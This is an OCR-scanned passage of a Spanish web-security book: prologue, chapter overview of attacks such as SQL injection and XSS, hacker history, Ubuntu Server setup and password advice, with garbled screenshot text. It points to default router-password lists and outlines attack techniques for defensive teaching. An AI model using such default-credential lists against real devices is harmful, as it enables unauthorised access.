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Prólogo 


Quien está leyendo estas palabras se encuentra frente a un 
libro que puede abrirle las puertas al maravilloso mundo de la 
seguridad informática. Los aspectos más importantes de la materia 
son explicados de manera entretenida, con ejemplos prácticos, 
porque la mayoría de las personas que trabajamos en seguridad lo 
hacemos no solo como un trabajo, sino también como un juego que 
nos permite mantenernos siempre alertas, siempre aprendiendo. 

Recomiendo leer este libro detenidamente, prestando atención 
a cada uno de los consejos y, si es posible, llevando a la práctica, 
paralelamente, todos y cada uno de los ejercicios propuestos. De 
este modo se irán encontrando las respuestas a las preguntas que 
el mismo libro sugiere plantearse. Después de todo, un buen libro 
no debe dejarnos solo respuestas, si no también preguntas que 
antes ni siquiera se nos hubiesen ocurrido. 

Todos los ejemplos están basados en GNU/Linux, que es el 
mejor sistema para aprender sobre seguridad, puesto que expone 
todo su funcionamiento interno para que podamos analizarlo y 
entender mejor cada una de sus partes. Sin embargo, una vez 
adquiridos los conocimientos, se vuelve sencillo transportarlos 
a cualquier otro sistema. 

Por supuesto, se hablará acerca de protocolos (como DNS y 
HTTP) pero, a diferencia de lo que sucede con muchos otros libros, 
se va a explicar de una manera clara para qué sirven y por qué son 
importantes en el funcionamiento de internet (algo fundamental 
para cualquier persona que se encuentre interesada en aprender 
las artes del hacking). Indefectiblemente, también se desarrollarán 
los ataques más populares, de los cuales son víctimas muchas 
aplicaciones web. 

Cuando comencé a interesarme por la seguridad hubiera estado 
encantado de poder contar con esta obra. Sugiero al lector que 
la aproveche y lea detenidamente, ya que le brindará recursos 
invaluables que le permitirán ser un mejor profesional. 


Fabián Portantier 
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El libro de un vistazo 


Este libro está dirigido a los programadores que deseen desarrollar apli- 
caciones web con un mayor nivel de seguridad y a todas aquellas personas a 
quienes les interese comprender las técnicas utilizadas por los hackers para 
comprometer un servidor web y sus componentes. Nos enfocaremos en el 
análisis de estas técnicas, aplicando siempre la contracara de la defensa. 


*f vu *emu DI 
SEGURIDAD EN LA WEB ATAQUES CROSS-SITE 


Instalaremos la distribución Linux Ubuntu Server Los ataques de tipo Cross-Site aprovechan 
para realizar las prácticas que se desarrollan fallos de seguridad en los sitios para afectar a 
a lo largo del libro. Además, explicaremos sus usuarios, robándoles sus credenciales de 
conceptos básicos y medidas de seguridad acceso e incluso apoderándose por completo 
tales como la asignación de contraseñas, 


permisos, distribución de servicios y respaldos 


de su navegador web. Aprenderemos estas 
técnicas de ataque para desarrollar una 


de información. aplicación que las resista. 


* 


*f 


DEL CLIENTE AL SERVIDOR 


vu v 


SERVIDORES DNS 


Analizaremos en profundidad los servidores Aprenderemos a manipular los formularios de 


DNS, su estructura y funcionamiento. Además, 
aprenderemos técnicas de extracción de datos 
que se pueden aplicar al servidor DNS de una 
organización para obtener información sobre la 
estructura interna de su sitio web. 


*f DIA 


PROTOCOLO HTTP 


Conoceremos tanto los métodos de petición 
existentes en el protocolo HTTP, como las 
cabeceras que podemos definir y utilizar para 
obtener información sobre un servidor web y el 
software que utiliza. 
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modo que podamos ver información acerca de 
éstos, eliminar límites de caracteres, ver campos 
ocultos y saltar todas las protecciones de un 
sitio, utilizando tecnologías del lado del cliente. 


* ME y UY 


INCLUSIÓN DE ARCHIVOS 


Un incorrecto filtrado de los archivos que pueden 
incluirse dentro de una aplicación puede derivar 
en un fallo de seguridad que permita a un 

hacker obtener el control total del servidor web. 
Comprenderemos cómo se produce esta falla y la 
manera de evitarla en nuestros proyectos. 
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* ' re * AO vu vY 
EJECUCIÓN REMOTA DE CÓDIGO INYECCIÓN SQL A BASES DE DATOS 


Identificaremos las funciones PHP que pueden Las inyecciones SQL le permiten a un hacker 
convertirse en un vector de ataque cuando saltar un sistema de autenticación hasta 

no son utilizadas correctamente por los obtener una base de datos completa. 
desarrolladores. Además, aprenderemos a Realizaremos inyecciones SQL a los gestores 
evadir filtros y, finalmente, a implementar las MySQL, PostgreSQL y Oracle Database. 
protecciones adecuadas. Además, implementaremos protecciones 


desde el código para evitar, en lo posible, las 
inyecciones SQL en nuestra aplicación. 


*ME€ uv 
REVELACIÓN DE INFORMACIÓN k 


Conoceremos los errores de configuración e vuv 
más frecuentes que permiten a un hacker SEGURIDAD EN EL SERVIDOR 

obtener información de gran utilidad sobre un Luego de analizar los fallos de programación 
servidor web, sin hacer demasiados esfuerzos. que pueden derivar en vulnerabilidades dentro 
Analizaremos cuáles son estas configuraciones del código de una aplicación, es hora de 

inseguras y las modificaciones que podemos implementar seguridad dentro del servidor 

realizar para evitar exponer información sensible. web. Aprenderemos a instalar un Web Firewall 


y areforzar todas las medidas que hemos 
aprendido en capítulos anteriores. 


INFORMACIÓN COMPLEMENTARIA 


A lo largo de este manual, podrá encontrar una serie de recuadros que le brindarán información complementaria: 
curiosidades, trucos, ideas y consejos sobre los temas tratados. Para que pueda distinguirlos en forma más sencilla, 
cada recuadro está identificado con diferentes iconos: 


CURIOSIDADES ATENCIÓN DATOS ÚTILES SITIOS WEB 
E IDEAS Y NOVEDADES 
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Introducción 


En sus comienzos, la web no era más que documentos en texto 
plano que se enlazaban unos a otros mediante hipervínculos. Hoy, esos 
simples documentos evolucionaron a tal punto que se convirtieron en 
complejas aplicaciones capaces de interactuar con el usuario y manejar 
inconmensurables cantidades de información de todo tipo. 

Junto las tecnologías web, también evolucionaron los problemas 
vinculados a la seguridad, en especial porque estas novedosas aplicaciones 
empezaron a ofrecer servicios que requerían de información tan sensible 
como tarjetas de crédito y datos confidenciales sobre sus usuarios. 

Esta constante evolución tecnológica, y los problemas de seguridad 
que suscita, fueron los aspectos fundamentales que motivaron a realizar 
esta obra, cuyo objetivo principal es que el lector pueda comprender 
las fallas de programación y configuración que permiten a un atacante 
comprometer la seguridad de una aplicación web y sus bases de datos. 

La premisa que guía este libro es que para saber defenderse es 
necesario saber atacar. Debido a esto, en cada tema expuesto se 
desarrollan ejemplos de códigos que son analizados para identificar la 
falla que poseen y cómo puede ser explotada por un atacante. A partir de 
esta explicación, se proponen diversas maneras de solucionar cada una 
de las vulnerabilidades de seguridad que han sido tratadas. 

Empezaremos desde los conceptos más básicos y los consejos 
más simples —-pero que son indispensables- y avanzaremos hasta los 
protocolos involucrados en una plataforma web y el modo en que pueden 
convertirse también en un vector de ataque. 

Luego analizaremos de manera integral los fallos más frecuentes 
de seguridad en la programación de aplicaciones web y cómo pueden 
ser descubiertos y explotados, junto a la manera de solucionarlos. 
Aprenderemos también cómo un atacante puede obtener una base 
de datos completa realizando técnicas de ataque a los gestores más 
populares y, por último, implementaremos medidas de protección más 
avanzadas en el interior del servidor web. 

Espero que este libro sea una gran herramienta, que permita comprender 
las técnicas más utilizadas por los hackers para comprometer la seguridad 
de todos los componentes que se encuentran en un servidor web. 


Bienvenidos a la seguridad en el universo web. 


Sheila Berta 
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Seguridad en la web 


En este primer capítulo nos introduciremos en la seguridad 
informática, a partir de la definición de conceptos y la 
identificación de los personajes involucrados. 

Empezaremos desde cero con la seguridad de una plataforma 
web e instalaremos un servidor y le aplicaremos medidas 
básicas de protección: contraseñas, permisos de usuarios 


y archivos y configuraciones de las aplicaciones. 
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Marco histórico 
y definiciones 


Hace algún tiempo se habló mucho acerca del sitio WikiLeaks, que 
publicó documentos secretos del Pentágono y otras organizaciones 
gubernamentales. El grupo hacktivista Anonymous salió en su 
defensa mediante la operación conocida como Operation Payback, 
contra las leyes del ACTA (Acuerdo Comercial Anti-Falsificación), los 
derechos de autor y la censura en internet. 

Finalmente, se desató una guerra informática que llamó la atención 
de muchos países y del periodismo mundial. 

Hechos como este pueden hacernos surgir preguntas como: 
¿podría un hacker obtener información confidencial acerca de mí? 
En caso de tener una empresa, ¿cómo puedo evitar que roben los 
datos de mis clientes o de mis productos?¿Existe alguna manera 
certera de proteger mi información privada? 

En esta primera parte del capítulo nos enfocaremos en definir 
conceptos claves que nos ayudarán a comprender mejor el resto de 
la obra, a lo largo de la cual iremos respondiendo estas preguntas. 


Figura 1. Bandera del grupo hacktivista 
Anonymous, utilizada en la mayoría 
de los videos y mensajes de su autoría. 
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Seguridad informática en la web 


Para comprender mejor esta expresión, 
podríamos definir dos conceptos: por un lado, 


seguridad informática, y por el otro, seguridad LA SEGURIDAD 

informática aplicada a la plataforma web. INFORM ÁTIC A 
Definir seguridad informática podría ser algo 

complicado. A lo largo de los años se le han dado PROTEGE LOS DATOS 

muchas definiciones diferentes a este término. La DE LOS SISTEMAS 

informática abarca el tratamiento de información 

utilizando sistemas computacionales; cuando COMPUTACIONALES 

hablamos de seguridad informática, entonces, nos 

referimos a cómo proteger esa información de “; , 

personas malintencionadas o, simplemente, de quienes no deban verla. 


Para hacerlo debemos mitigar los riesgos que se encuentren en el sistema. 
En este libro trataremos específicamente la seguridad informática 
aplicada al campo web. Actualmente, existen millones de aplicaciones 
webs que contienen y manejan diariamente información sensible (bancos, 
correos electrónicos, webs de compra y venta, cuentas privadas, etcétera). 
Si dicha información sufriera un robo o fuera alterada, podría llegar a 
comprometer seriamente tanto a las organizaciones como a sus usuarios. 


proa 
Mireioón da Ootoaó + 
et 2 a 
Y tmutór de Comor 2 Cd (torno E tem Y dr El act Y Car € ar ar US hr A. E 
SbD 
SECUBITIBVYIEFAL.T.COM 
USTADO DE PACKERS Y 'CRYPTERS GRATUITOS ESA 
A Oo » 


6) 


PP... 
LIBRO: PERITAJE INFORMÁTICO Y TECNOLÓGICO 


Figura 2. Security by Default 
(www.securitybydefault.com) es un excelente 
blog en español sobre seguridad informática. 
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Hackers y Defacers 


Algunas personas llaman a los hackers criminales informáticos, 
piratas de la red, mafiosos de las computadoras, terroristas 
cibernéticos, entre muchos otros términos. Esto puede deberse a 
que es común escuchar noticias donde se acusa a un hacker de haber 
robado miles de cuentas bancarias, de correos electrónicos y de redes 
sociales, o tal vez de haber ingresado al 
sistema de alguna empresa o gobierno y 
alterado información confidencial, entre 
otros delitos cibernéticos. 

Por el contrario, otras personas los 
admiran por su gran conocimiento (aunque 
quizás no sepan exactamente quiénes son 
y qué hacen). También hay quienes ni si 
quiera saben que existen. 

Dedicaremos esta sección del libro a 
aclarar todas las dudas que puedan surgir 
acerca de los hackers. 


: Figura 3. Die Hard 4.0 es un 
mo DIE HARD 4.0 film con Bruce Willis donde los hackers 


son protagonistas. 


En la década del 60, el MIT (Instituto Tecnológico de 
Massachusetts) adquirió la primera computadora, PDP-1. Sus 
estudiantes, que poseían un laboratorio de inteligencia artificial, 


"LAS 


4h REDUSERS PREMIUM 


Para obtener material adicional gratuito, ingrese a la sección Publicaciones/Libros dentro de http:// 


premium.redusers.com. Allí encontrará todos nuestros títulos y podrá acceder a contenido extra 
de cada uno, como sitios web relacionados, programas recomendados, ejemplos utilizados por el 
autor, apéndices y archivos editables o de código fuente. Todo esto ayudará a comprender mejor los 


conceptos desarrollados en la obra. 
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desarrollaron herramientas de programación y el Instituto se convirtió 
en el primero en dictar cursos de ciencias de la computación. Fue 
en ese momento cuando empezó a surgir lo que hoy conocemos como 
cultura hacker. Los estudiantes del MIT se hacían llamar hackers 
porque mejoraban o modificaban programas para que realizaran 
acciones diferentes a las originales. 

En 1969, el Departamento de Defensa de los Estados Unidos creó 
la primera red de computadoras intercontinental de alta velocidad, 
ARPANET. Logró comunicar a cientos de investigadores de universidades, 
escuelas y centros de investigación, facilitando el intercambio de 
conocimientos e información con gente de cualquier parte y 
contribuyendo al avance de la tecnología y de la cultura hacker. 


Figura 4. El emblema hacker, un símbolo de la cultura 
hacker creado por Eric S. Raymond en octubre de 2003, 


Parecidos pero diferentes 

La palabra hacker ha recibido diferentes definiciones a lo largo 
de los años. Sin embargo podemos afirmar que se trata de una 
persona apasionada por el conocimiento, siempre dispuesta a seguir 
aprendiendo, investigando y actualizándose sobre un tema determinado, 
que podría ser completamente diferente a la informática, aunque 
asociemos la palabra hacker automáticamente con una computadora. 
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En el ámbito de la seguridad informática, un hacker es un experto 
en el tema. Por este motivo es que algunos individuos dicen ser 
hackers con el único objetivo de poder sorprender a quienes no tienen 
muy en claro lo que esto realmente significa. 

Probablemente hayamos notado que en el título de esta sección 
se nombra a un segundo personaje, el defacer. La denominación se 
atribuye a quienes practican el deface o defacing: se trata de 
modificar la portada o cualquier otra página de un sitio web sin la 
autorización del administrador. Quizás nos estemos preguntando qué 
sentido tiene hacer esto o con qué objetivo lo hacen. Por lo general, la 
intención es de dejar un mensaje a los dueños de la página, algo que 
vemos muchas veces en noticias que muestran sitios webs de 
empresas, instituciones o gobiernos que son defaceados. 


OwneD by Cvir.System =) 


UN SERVICIO DE TEAROR 


100 TE ESTAFO JAJAJA 


Figura 5. Deface realizado a Speedy/Telefónica 
por Cvir.System en el año 2010, con un claro mensaje de queja. 


Tipos de hackers 

Como hemos dicho, un hacker es una persona de abundantes 
conocimientos, un verdadero experto en el área. Sin embargo, si bien hay 
quienes utilizan estos conocimientos para asegurar y proteger los sistemas 
informáticos, otros buscan el modo de romperlos o acceder a ellos sin 
autorización para robar la información que contienen. Aquí es donde entra 
en juego la ética hacker. Según la elección que hagan, se los clasifica 
como White Hat o Black Hat (sombrero blanco o sombrero negro). 
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Los White Hat Hackers (o hackers de 


sombrero blanco) son quienes utilizan sus LA ETICA 
conocimientos para brindar protección a los PROFESIONAL 
sistemas informáticos. Suelen analizar aplicaciones 
-generalmente de código abierto- en busca de DIVIDE A LOS 
vulnerabilidades, con el fin de reportarlas y HACKERS EN WHITE 
aumentar la seguridad del software. Muchos 
trabajan para grandes empresas o proyectos de HAT Y BLACK HAT 
informática enfocados a mejorar la seguridad. 

Los Black Hat Hackers, al contrario, utilizan =, e 
sus saberes para corromper el funcionamiento de un sistema o robar 


la información que contenga. El hecho de que sean hackers de sombrero 
negro no significa que posean menos conocimientos que los de sombrero 
blanco. Los Black Hat también son hackers y tienen gran conocimiento 
pero escasa ética. Buscan vulnerabilidades en aplicaciones pero no las 
reportan, sino que las explotan a su conveniencia. 

¿Existe una línea intermedia entre estos dos tipos de hackers? 
Efectivamente la hay: los Grey Hat Hackers. Estos utilizan sus 
conocimientos para defender, algunas veces, y otras para atacar, según 
les convenga. Por ejemplo, si encuentran vulnerabilidades en aplicaciones, 
analizarán si les conviene más reportar la falla o no hacerlo, según lo que 
la empresa dueña del software les ofrezca y sus propios objetivos. 


Figura 6. Hacker Evolution es un juego que pretende desafiar 
la inteligencia de los gamers, quienes deben asumir el papel de un hacker. 
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Psicología del hacker 

La maravillosa sensación de llegar al final de la meta, de cumplir un 
objetivo, de conseguir lo que se quiere. La adrenalina al entrar a un lugar 
desconocido, secreto o prohibido. La exaltación por descubrir algo que 
todavía nadie descubrió... ¿serán esas emociones las que impulsan a un 
hacker a hacer lo que hace? Es probable que sí, pero no todos tienen las 
mismas motivaciones y objetivos. 

Muchos coincidirán en que la curiosidad es indispensable para 
introducirse en este mundo. Impulsa a los principiantes a seguir 
aprendiendo e investigando el funcionamiento de las cosas, a no 
quedarse solo con lo que se ve en la pantalla e ir más allá. Muchas 
veces es también la causa por la cual un hacker experimentado entra 
a un sistema, queriendo saber qué hay, con qué información se va a 
encontrar y si podrá serle útil o no. 

Por otra parte, existen quienes solo buscan engrandecer su 
nombre: por lo general, los defacers. Una gran parte de ellos no 
son en realidad verdaderos hackers sino adolescentes con mínimos 
conocimientos, que solo quieren alimentar su ego y conseguir el 
respeto de sus pares. Un deface que muestra el nombre de quien 
lo realizó, sin ningún mensaje hacia los administradores, es el 
prototipo de lo que son capaces de hacer. Un verdadero Black Hat 
Hacker no desperdiciará el tiempo poniendo su nombre en una 
página web, ya que si consigue 
Google Puerto Rico Hacked ! acceso a un sistema buscará 
beneficiarse con lo que ha 
Agd Scorp *: Thehacker logrado y pasar desapercibido. 


rx35 Cry King - BLaSTeR 


Figura 7. Deface realizado 
a la página de Google 
de Puerto Rico en el año 2009. 


Kerem125, Jextonic , SIMA, Redrolix, Kacak 
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Un White Hat Hacker quizás tenga como objetivo conseguir 
trabajo en una empresa de seguridad informática, por lo que buscará 
la manera de demostrar lo que sabe (por ejemplo, encontrando fallas 
de seguridad en las aplicaciones de la empresa y reportándolas hasta 
que logre conseguir oficialmente un puesto). 

Seguramente un Black Hat Hacker también quiera conseguir dinero 
aprovechando todo el conocimiento que tiene, pero elige otros 
caminos, tales como el robo de cuentas bancarias y la venta 
de contraseñas de correos electrónicos y redes sociales. 

Como conclusión, podríamos decir que son múltiples las 
motivaciones que puede tener un hacker. Van desde la simple curiosidad 
y las ganas de divertirse hasta la búsqueda de un beneficio económico 
a partir de lo que sabe. Todo dependerá de sus objetivos finales. 

Ahora que conocemos a los hackers y sus motivaciones, vamos a 
realizar la instalación de un servidor web para poder llevar a cabo 
las pruebas de seguridad. 


Instalación de un 
servidor web 


Para realizar todas las pruebas de seguridad que analizaremos 
en este libro es ideal que contemos con un servidor web propio donde 
podamos hospedar nuestros códigos de ejemplo y hacer prácticas. 

En la actualidad, muchos servidores web utilizan como sistema 
operativo alguna distribución GNU/Linux (Debian, CentOS, 
OpenSuSE, Fedora, entre otras). Estas distribuciones no vienen 


DN ÉTICA HACKER 


La ética es una rama de la filosofía que abarca el estudio de la moral y está asociada a la distinción 
entre lo que se considera bueno y malo. La ética de un hacker se ve reflejada en las decisiones que 
toma, por ejemplo, al obtener acceso a un sistema. Finalmente, según su ética será un Black Hat 
Hacker o un White Hat Hacker (ethical hacker). 
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específicamente para ser instaladas en servidores web, por lo cual 
es muy probable que contengan aplicaciones innecesarias. Por ejemplo, 
no nos sería de nada útil contar con la aplicación OpenOffice si estamos 
usando la distribución en un servidor web. 

Seguramente hemos escuchado hablar sobre la famosa 
distribución GNU/Linux Ubuntu. Esta distribución cuenta con 
una versión llamada Ubuntu Server que es muy fácil de instalar 
y no trae aplicaciones innecesarias, ya que viene específicamente 
preparada para ser instalada en servidores web. A continuación, 
detallaremos su instalación. 


Descarga de Ubuntu Server 


Dado que esta versión de Ubuntu es específica para servidores web, 
cuenta con un kernel optimizado y sus requisitos mínimos son de 
128 megabytes de RAM y 1 gigabyte de espacio en el disco. 

Para descargar Ubuntu Server ingresamos al sitio web oficial 
de Ubuntu (www.ubuntu.com), nos dirigimos al menú Download y en 
el menú desplegable seleccionamos el ítem Server. 


Dim ns e es + 


e hoc a 


O dui de Cañar Y 0D (Fano Úl tragar O hire: E Minatraaas- £ Guilicar S/ Muos Pe Teto MN Vin Gamo ¿Ca 


Download Ubuntu Server 


For extended support, 


$ 


Figura 8. Ubuntu cuenta con versiones adaptadas a las necesidades 
de cada usuario, entre ellas Ubuntu Desktop y Server. 


Tendremos que elegir si descargamos la versión de 32 bits o de 
64 bits. Una vez hecho, presionamos el botón Get Ubuntu. 
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Instalación del sistema 


Una vez terminada la descarga de la imagen .iso de Ubuntu Server 
procedemos a grabarla en un CD y arrancamos desde éste para iniciar 
con la instalación del sistema. 

Si no queremos hacer cambios en nuestro equipo al instalar Ubuntu 
Server, tenemos otra opción, que es utilizar una máquina virtual. 
Estas nos permiten instalar el sistema operativo deseado sin alterar la 
información que contenga nuestro disco duro. En el tema Reducción 
y distribución de servicios de este capítulo podremos encontrar 
más información sobre las máquinas virtuales. 


- Language - 

imharic Gocilge Malayalam Thai 
Arabic Galego Marathi Tagalog 
Asturianu Gujaratl Nepali Túrrge 
benorycaa | MUY Nederlanos Vughur 
Brarapcin Hindi Norst bokmál Vxpalmoera 
Bengali Hrvatekl Norsk nynorsx Tiéng vi6t 
Dosarski Magysr Punjabi (Gurmuxh 1) 
Catal3 Bahasa Indonesia | Polski Zi 4) 
Cestina Íslenska Portugués do Brasil 
Dansk Italiano Portugués 
Deutsch EXE Román 
Dzongkha Joboror Pyccruñ 
DiAnará Kasar Simegi!1ii 

Khmer s mv 
Esperanto 5303 Slovencira 
Español! $201 Slovenítina 
Eesti Kurdi snaip 
Euskara Lao Concxm 
Mor Lietuviótai Svenska 
suomi Latvisk! Tamil 


Sox 


Francais Makezonckn 


Figura 9. Como podemos observar, Ubuntu Server 
está disponible en una amplia cantidad de idiomas. 


La Figura 9 muestra la primera pantalla que aparece al arrancar desde 
el CD. Como Ubuntu Server está disponible en muchos idiomas, nuestro 


primer paso será seleccionar el idioma con el que preferimos trabajar. 


DN UBUNTU 


"AA 


Para quienes gustan de Linux, Ubuntu es una gran distribución, con diferentes versiones actualizadas 


constantemente y adaptadas a las necesidades de cada usuario. Además, hay abundante documentación 


de ayuda en internet y portales donde es posible plantear cualquier inquietud sobre el tema. 
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Acto seguido obtenemos una nueva pantalla con varias opciones, 
tal como se observa en la Figura 10. Lo más rápido es elegir la primera 
opción, Instalar Ubuntu Server. Si vamos a instalar el sistema en un disco 
duro quizá sea recomendable optar por Comprobar defectos en el disco 
antes de arrancar con la instalación, que también permite repararlo en 
el caso de que ya lo tengamos instalado. 


Figura 10. Una buena práctica es elegir la opción Comprobar 
defectos en el disco, que nos evitará problemas en la instalación. 


Si elegimos la primera opción, inmediatamente comenzará el 
instalador de Ubuntu Server. Como podemos observar, no tiene una 
bonita interfaz gráfica, ya que no trae instalado ningún entorno gráfico 
como KDE (www.kde.org) o GNOME (www.gnome.org). 

En esta primera parte de la instalación tendremos que configurar 
cuestiones básicas; en primer lugar, debemos seleccionar nuestro 
país o región y luego el origen del teclado que estemos utilizando. 


"AS 


PELÍCULAS ACERCA DE LOS HACKERS 


Existen muchos films relacionados con estos temas. Entre otras, se encuentran: Sneakers (1992), 
The Net (1995), Hackers (1995), The Matrix (1999), Takedown (2000), Antitrust (2001), Firewall 
(2005), The Net 2 (2006) y Die Hard 4 (2007). 
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Luego continuamos con la configuración de red e introducimos un 
nombre para nuestra máquina (tal como muestra la Figura 11). 


j Configusr le red 
Por favor, introduzca el nontre de la ságuina 
El nontre oe máquina es una sols palabra que ¿dentifica el sistema en la red, Consulte al 


administrador de red sl no sabe qué nontre deberia tener. Si está configurando una red 
doméstica puede inventarse este nombre. 


Nombre de La abquina: 


Antrocodor> «Continuar» 


Figura 11. Introducimos el nombre de la máquina 
y luego el nombre de usuario. 


Luego de indicar el nombre del equipo, procedemos a configurar 
usuarios y contraseñas. Primero se nos solicita el nombre completo 
del usuario, luego ingresamos el nombre de la cuenta y finalmente 
le asignamos una contraseña (se pedirá confirmación). 


1113 Com ¡gurar un Lo ontraneñas 
Seleccione un nombre de usuerio paro la mueva cuenta, du nombre, +in aprllidos ni 
especios, es uns elección razonable, El nostre de usuario debe enpezar con ura letra 
minúsculas, seguida de cuelauler combinación ds números y más Letras minúsculos. 


Nombre de usuario para la cuenta 


Cont iruar> 


Figura 12. En esta ventana introducimos un identificador 
de usuario (o nombre de usuario para la cuenta), 
que no necesariamente debe ser ¡igual al nombre real. 


www.detodoprogramacion.com www.redusers.com 


25 


< 


26 (MES 1. SEGURIDAD EN LA WEB 


Continuando con la instalación, configuraremos el reloj. El instalador 
automáticamente nos dirá nuestra zona horaria de acuerdo a la 
ubicación geográfica que hayamos elegido en los pasos anteriores. 

Si es correcta, seleccionamos SÍ. 

Llegamos así a un paso que tiene fama de ser complicado: el 
particionado de discos. Se presentan algunas opciones, tales como 
el Particionado guiado usando todo el disco o el Particionado manual. En la 
mayoría de los casos se utiliza la primera, ya que se está instalando un 
servidor web que generalmente estará en funcionamiento las 24 horas 
los 365 días del año. 


Este imtaletor puede pularie en el particionado del disco tutilizardo distintos esquemas 
estándo) o, +l lo deses, puete hacerlo de forms mwual. $1 escoge el sistem de 

ob rs puiado tenerá la ovortunidad sás adelaste de revisar y adapte Los 

result . 


Se le regar ad disco as titi «l elige particionado puiado rara ym discos 
completo. 


mtodo de part ic Lonado: 


budsdo - utilizar el disco completo y cortigre LW 
Quiado - utilizar todo el disco y confiprar 1m cifrado 
Mara 


Figura 13. Quienes tengan conocimientos en Linux 
pueden utilizar tranquilamente el particionado manual. 


En la próxima ventana elegimos en qué disco duro queremos 
instalar Ubuntu Server; luego aparecerá un resumen con las 
modificaciones que se harán sobre el disco que hayamos 
seleccionado. Si estamos de acuerdo pulsamos Sí y, finalmente, 
comenzará la barra de progreso que mostrará el estado en que se 
encuentra la instalación de Ubuntu Server sobre nuestro disco duro. 

Existe la posibilidad de configurar el acceso a la red mediante 
un proxy. Si no tenemos ninguno, dejamos el campo en blanco y 
continuamos. Se realizarán algunas configuraciones automáticamente 
y luego tendremos que elegir la forma en que se administrarán las 
actualizaciones del sistema: podemos elegir la opción Sin actualizaciones 
automáticas o Instalar actualizaciones automáticamente. 
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En este momento nos encontraremos con una parte muy interesante: 
la selección de programas. Ya estamos muy cerca de finalizar por 
completo la instalación de Ubuntu Server. 


11) selección de programas 


De momento sólo está instalado el sistema básico. Puede escoger la instalación de las 
siguientes colecciones predefinidas de programas pora adoptar más la instalación a sus 
necesidades. 


Elegir los programas a instalar: 


«Cont inuar> 


Figura 14. Ubuntu Server nos da la posibilidad de instalar 
automáticamente servicios necesarios en un servidor web. 


Este paso queda a preferencia de cada uno, según lo que se quiera 
instalar. Tenemos varias posibilidades, entre ellas LAMP Server, 
que instala los servicios de Apache, MySQL y PHP. Las siguientes 
pantallas dependerán de lo que hayamos seleccionado: por ejemplo, 
si elegimos LAMP Server, se nos pedirá la contraseña para el usuario 
root de la base de datos MySQL. 

Por último, si instalamos Ubuntu Server junto a otros sistemas 
operativos, instalaremos el gestor de arranque (GRUB), que nos 
permitirá elegir con cuál iniciar. Aunque esté solamente Ubuntu Server 
en nuestro disco duro, optamos por Sí y finalizamos con la instalación 
del sistema. Para concluir, extraemos el CD y reiniciamos el equipo. 


HO DOCUMENTACIÓN SOBRE UBUNTU 


Desde https: //help.ubuntu.com podemos acceder a la documentación oficial de Ubuntu (en inglés). Allí 


podremos encontrar la Ubuntu Server Guide con información muy útil sobre cómo instalar y configurar 
el sistema, la red y servicios como OpenSSH, LAMP Server, DNS, FTP, entre otros. 
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buntu 12,04.2 LTS us-shey ttyl 


is-shey login: shey 
Passuord : 
elcone to Ubuntu 12,04,2 LTS (GNU/Linux 3.5.0-23-generic 1686) 


* Documentation AS help. .ubuntu.conm 

System information as of Sun Jun 39 18:29:49 ART 2013 

System load 0.78 Processes BO 

Usage of 15.27 of 6.896B Users logged in 0 

Memory usage: O IP address for eth0: 10.0.2 

Suap usage 0) 

Graph this data and manage this system at https landscape .canonical .com 
The prograns included with the Ubuntu system are free softuare: 
the exact distribution terms for each progran are described in the 


2s in /usr/share/doc/*/copyr ight 


Ibuntu comes uith ABSOLUTELY MO MARRANTY, to the extent permitted by 
applicable lau 


:hey0us-shey :7$ q 


Figura 15. Si nuestra instalación fue un éxito, obtendremos 
como resultado final una pantalla similar a la que vemos en esta figura. 


Consejos básicos 


A esta altura del capítulo ya tenemos en claro los conceptos básicos 
y sabemos quiénes son los hackers, qué hacen y cómo piensan. Por 
supuesto, también debemos tener en funcionamiento nuestro servidor 
web. Si esto es así, llegó el momento de comenzar con el tema que 
verdaderamente nos importa: la seguridad web. Empezaremos con 
los consejos básicos, indispensables para proteger nuestro sistema. 


Contraseñas seguras 


Obtener el control total sobre un servidor web ajeno puede ser 
mucho más fácil de lo que pensamos. Si hablamos de contraseñas 
esto se intensifica aún más, ya que no solo es posible apoderarse 
de un servidor web sino de cualquier tipo de cuenta que posea una 
contraseña de acceso. A continuación, veremos cuáles son los errores 
más frecuentes que un usuario comete al crear contraseñas. 

e Contraseñas por defecto: muchos paneles de administración, 
dispositivos y cuentas de cualquier tipo suelen venir con una 
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contraseña predefinida. Generalmente estas contraseñas son muy 
sencillas, como la clásica “1234”, y por ende fáciles de adivinar. Es 

un error muy común no cambiarlas, ya que probablemente un hacker, 
al encontrarse con un panel de administración, intente ingresar 
usando combinaciones de este estilo. 


UNRELESS 


Figura 16. Los routers suelen venir con usuario 
y contraseña predefinidos, muy fáciles de adivinar. 


e Contraseñas obvias: pongámonos en el lugar del hacker. 
Si el primer método no funciona (es decir, si la contraseña no era 
ninguna de las predefinidas) empezará a pensar cuál otra puede 
ser. Aquí es donde entra en juego toda la información personal 
que tiene el hacker sobre el usuario de la cuenta. Cuando decimos 
contraseñas obvias nos referimos a las que contienen información 
personal, como nuestro número de teléfono o celular, domicilio, 
nombres, etcétera. Es muy común utilizar estos datos como 


D LISTAS DE CONTRASEÑAS POR DEFECTO 


En internet podemos encontrar varios sitios donde se muestran listados de usuarios y contra- 


señas por defecto que traen muchos dispositivos de red, como los routers. Uno de ellos es el sitio 
http: //routerpasswords.com, donde podemos seleccionar el modelo del router. Otro, un poco más 
detallado, es www.phenoelit-us.org/dpl/dpI.html. 
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contraseña ya que son fáciles de recordar, pero a la vez muy 
fáciles de obtener por otra persona. 

e Contraseñas repetidas: usar la misma contraseña para todas 
las cuentas puede ser peligroso. Sabemos que recordar una sola 
contraseña es más fácil que memorizar unas cuantas, pero un 
hacker también lo sabe y, si consigue la contraseña de alguna de 
nuestras cuentas, enseguida se fijará si coincide con las demás. 

e Contraseñas débiles: al crear una cuenta de correo electrónico, 
por ejemplo en Outlook, podemos observar que a la derecha del 
campo para la contraseña nos aparece un mensaje que nos obliga 
a combinar letras, números y/o símbolos para crear una clave más 
segura. Esto se debe a que existen ataques por fuerza bruta, es 
decir, programas que obtienen las contraseñas probando todas 
las combinaciones posibles dentro de un set de caracteres dado. 
Mediante este ataque la contraseña va a ser encontrada en algún 
momento, pero el proceso puede demorar desde unos pocos 
segundos hasta horas, días, semanas, meses o años, dependiendo 
de la longitud y complejidad de la clave y del equipo atacante. 
También existe el ataque de diccionario, que, a partir una lista de 
posibles contraseñas, intenta conseguir el acceso a prueba y error. 
Este ataque es más eficiente si la contraseña está definida en la lista 
o diccionario, pero es inútil si no lo está. En conclusión, cuanto más 
extraña sea la contraseña más difícil será obtenerla. 


Tengamos presentes estos cuatro tipos de contraseñas inseguras 
cada vez que debamos crear alguna. Si nuestra contraseña no contiene 
datos personales, no es una de las clásicas predefinidas ni está 
